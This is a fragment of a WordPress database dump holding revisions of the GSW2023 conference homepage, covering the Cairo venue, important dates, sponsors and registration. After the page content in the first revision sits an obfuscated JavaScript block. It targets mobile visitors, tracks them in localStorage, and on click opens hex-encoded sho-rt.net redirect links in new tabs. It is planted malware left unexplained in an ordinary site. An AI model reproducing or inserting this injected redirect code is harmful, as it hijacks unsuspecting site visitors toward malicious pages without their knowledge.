10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:58:32','2023-04-02 01:58:32','',3066,'https://gsw2023.com/?p=4000',0,'revision','',0),
(4001,1,'2023-04-02 01:59:20','2023-04-02 01:59:20','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400344244{margin-top: 95px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"]&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 